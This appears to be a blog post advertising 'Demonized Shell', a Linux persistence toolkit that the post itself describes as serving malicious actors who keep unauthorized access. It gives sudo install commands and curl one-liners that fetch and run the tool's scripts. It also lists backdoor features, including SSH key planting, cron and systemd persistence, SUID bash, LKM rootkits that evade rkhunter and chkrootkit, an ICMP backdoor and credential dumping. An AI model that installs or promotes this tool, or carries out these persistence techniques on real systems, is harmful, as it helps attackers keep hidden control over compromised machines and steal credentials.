Demonized Shell is an Advanced Tool for persistence in linux.

Demonized Shell is a sophisticated tool designed for achieving persistence in Linux systems. Its advanced features allow for maintaining unauthorized access over extended periods, making it a potent tool for malicious actors seeking to maintain control over compromised systems.

Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  •  LD_PRELOAD Rootkit
  •  Process Injection
  •  install for example: curl github.com/test/test/demonized.sh | bash
  •  Static D3m0n1z3dShell
  •  Intercept Syscall Write from a file
  •  ELF/Rootkit Anti-Reversing Technique
  •  PAM Backdoor
  •  rc.local Persistence
  •  init.d Persistence
  •  motd Persistence
  •  Persistence via php webshell.
  •  ACL Persistence.

And other types of features that will come in the future.


Download D3m0n1z3dShell

Next Post Previous Post
No Comment
Add Comment
comment url